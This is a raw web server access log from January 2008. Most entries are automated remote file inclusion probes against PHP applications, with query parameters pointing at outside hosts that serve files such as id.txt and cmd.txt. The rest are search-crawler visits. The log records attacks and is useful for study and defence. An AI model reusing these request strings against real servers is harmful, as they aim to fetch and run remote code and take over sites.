89.111.176.90 - - [26/Jan/2008:12:07:24 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:12:07:24 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.232 - - [26/Jan/2008:12:07:36 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:12:09:41 -0800] "GET /logs/access_071220.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.3.86.86 - - [26/Jan/2008:12:10:30 -0800] "GET /popup_window.php?site_isp_root=http://fantastiki.net/bod.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:12:11:33 -0800] "GET /index.php?pag=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:12:13:23 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:12:13:23 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:12:13:30 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.20.136 - - [26/Jan/2008:12:13:36 -0800] "GET /bikes/dteel/10MAR07/?S=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.107 - - [26/Jan/2008:12:13:38 -0800] "GET /logs/access.log HTTP/1.0" 200 326619 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.94 - - [26/Jan/2008:12:19:51 -0800] "GET /logs/access.log HTTP/1.0" 200 326815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.220.191.9 - - [26/Jan/2008:12:21:41 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.220.191.9 - - [26/Jan/2008:12:21:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.135.39.87 - - [26/Jan/2008:12:25:58 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.google.co.uk/search?aq=f&num=20&hl=en&newwindow=1&q=194.72.9.25&btnG=Search&meta=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
74.6.24.81 - - [26/Jan/2008:12:26:01 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.103 - - [26/Jan/2008:12:28:13 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.164.178 - - [26/Jan/2008:12:28:37 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.buergerfunk-bochum.de/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.164.178 - - [26/Jan/2008:12:28:37 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.buergerfunk-bochum.de/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.55.164.178 - - [26/Jan/2008:12:31:29 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.buergerfunk-bochum.de/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
72.55.164.178 - - [26/Jan/2008:12:31:29 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.buergerfunk-bochum.de/me.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.93.56.188 - - [26/Jan/2008:12:36:34 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/td.php?spaw_root=http://www.santacruzlive.com/ui/administrator/components/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:12:36:37 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:12:36:37 -0800] "GET /index.php?pag=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
69.57.148.17 - - [26/Jan/2008:12:36:37 -0800] "GET /logs/index.php?pag=http://www.birkelid.com/language/english/f1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:12:37:41 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:12:37:41 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:12:37:41 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:12:37:49 -0800] "GET /logs/access_080106.log//modules/TotalCalendar/about.php?inc_dir=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.80.93.168 - - [26/Jan/2008:12:40:28 -0800] "GET /logs/access_071230.log/modules.php?name=TotalCalendar&file=index&inc_dir=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [26/Jan/2008:12:40:28 -0800] "GET /modules.php?name=TotalCalendar&file=index&inc_dir=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [26/Jan/2008:12:40:29 -0800] "GET /logs/modules.php?name=TotalCalendar&file=index&inc_dir=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [26/Jan/2008:12:40:53 -0800] "GET /logs/access_080106.log/modules.php?name=TotalCalendar&file=index&inc_dir=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
86.127.93.78 - - [26/Jan/2008:12:47:11 -0800] "GET /logs/include/addons/image_resize/pages/index.inc.php?subpage=relations&REX[INCLUDE_PATH]=http://bobatka.info/modules/language/asc/asc/c9???? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.dmulk.com"
80.67.27.39 - - [26/Jan/2008:12:47:24 -0800] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.67.27.39 - - [26/Jan/2008:12:47:24 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.colecionismo.com.br//modules/coppermine/albums/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:12:47:51 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:12:48:36 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:50:09 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:50:16 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:50:18 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:51:58 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:52:00 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:52:03 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.135.39.87 - - [26/Jan/2008:12:52:44 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.google.co.uk/search?q=194.72.9.25&num=20&hl=en&newwindow=1&start=20&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:12:53:49 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:12:53:49 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:12:53:49 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [26/Jan/2008:12:53:50 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.pag.it/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.243.214.11 - - [26/Jan/2008:12:54:17 -0800] "GET /logs/access.log//redaxo/include/addons.inc.php?REX[INCLUDE_PATH]=http://rafb.net/p/ahABhd50.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.214.11 - - [26/Jan/2008:12:54:23 -0800] "GET //redaxo/include/addons.inc.php?REX[INCLUDE_PATH]=http://rafb.net/p/ahABhd50.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.28.34 - - [26/Jan/2008:12:54:35 -0800] "GET /bikes/dteel/EQ2/?M=A HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.243.214.11 - - [26/Jan/2008:12:54:39 -0800] "GET /logs//redaxo/include/addons.inc.php?REX[INCLUDE_PATH]=http://rafb.net/p/ahABhd50.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:12:54:48 -0800] "GET /logs/access_080106.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:12:54:48 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:12:54:48 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:12:55:01 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:12:55:03 -0800] "GET /logs/access_071224.log/main.php?id1=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:12:55:03 -0800] "GET /main.php?id1=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.55.196.91 - - [26/Jan/2008:12:55:04 -0800] "GET /logs/main.php?id1=http://www.abich.com/.r/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.155.109.117 - - [26/Jan/2008:12:55:07 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:12:55:40 -0800] "GET /logs/access_071225.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.121.21.39 - - [26/Jan/2008:12:56:09 -0800] "GET /logs/access_071225.log/index.php?pag=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.21.39 - - [26/Jan/2008:12:56:09 -0800] "GET /index.php?pag=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.121.21.39 - - [26/Jan/2008:12:56:10 -0800] "GET /logs/index.php?pag=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.55.164.183 - - [26/Jan/2008:12:56:44 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/wow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.173.130.137 - - [26/Jan/2008:12:56:55 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:12:57:23 -0800] "GET /errors.php?error=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.105 - - [26/Jan/2008:12:58:05 -0800] "GET /tmp/?N=D HTTP/1.0" 200 984 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.107 - - [26/Jan/2008:13:02:19 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.55.164.183 - - [26/Jan/2008:13:02:52 -0800] "GET //////////index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/wow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.155.109.117 - - [26/Jan/2008:13:03:37 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [26/Jan/2008:13:03:38 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [26/Jan/2008:13:03:38 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:13:06:37 -0800] "GET /index.php?get=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.146.38 - - [26/Jan/2008:13:08:43 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.55.146.38 - - [26/Jan/2008:13:08:43 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:13:10:38 -0800] "GET /logs/access_080101.log/akocomments.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:13:10:44 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:13:10:44 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:13:10:56 -0800] "GET /logs/access_071231.log/akocomments.php?mosConfig_absolute_path=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.144.235 - - [26/Jan/2008:13:11:12 -0800] "GET /logs/access_071230.log/?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [26/Jan/2008:13:11:13 -0800] "GET /?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.144.235 - - [26/Jan/2008:13:11:15 -0800] "GET /logs/?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 200 32483 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.22.126 - - [26/Jan/2008:13:12:03 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.150.200.101 - - [26/Jan/2008:13:12:53 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.150.200.101 - - [26/Jan/2008:13:12:53 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.150.200.101 - - [26/Jan/2008:13:12:54 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:13:16:45 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:13:16:45 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:13:19:19 -0800] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:13:19:21 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:13:19:22 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [26/Jan/2008:13:20:07 -0800] "GET /logs/access_071212.log//////////index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/wow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [26/Jan/2008:13:20:07 -0800] "GET /logs//////////index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/wow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:13:20:26 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.144.235 - - [26/Jan/2008:13:21:01 -0800] "GET /logs/access_071229.log/?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:13:21:04 -0800] "GET /logs/access_071230.log/index.php?get=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.232.118.239 - - [26/Jan/2008:13:21:04 -0800] "GET /logs/index.php?get=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [26/Jan/2008:13:21:23 -0800] "GET /logs/access_071111.log//////////index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/wow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:13:24:18 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.sajin88.com/bbs/data1/rac.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.72.103 - - [26/Jan/2008:13:24:18 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.sajin88.com/bbs/data1/rac.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [26/Jan/2008:13:24:41 -0800] "GET /logs/access_071212.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/wow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [26/Jan/2008:13:24:41 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/wow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.33.2.131 - - [26/Jan/2008:13:25:33 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:13:25:50 -0800] "GET /logs/access_080101.log//login.php?noSet=0&includedir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:13:25:51 -0800] "GET //login.php?noSet=0&includedir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.164.183 - - [26/Jan/2008:13:25:51 -0800] "GET /logs/access_071111.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.greytauctions.org/panji_tengkorak/wow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:13:25:51 -0800] "GET /logs//login.php?noSet=0&includedir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.163.197.176 - - [26/Jan/2008:13:26:53 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://indramayu.zzl.org/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:13:31:07 -0800] "GET /logs/access_071022.log//login.php?noSet=0&includedir=http://www.geneseobeadstudio.com/cmds.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.232.156.10 - - [26/Jan/2008:13:31:16 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://bpec-english.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
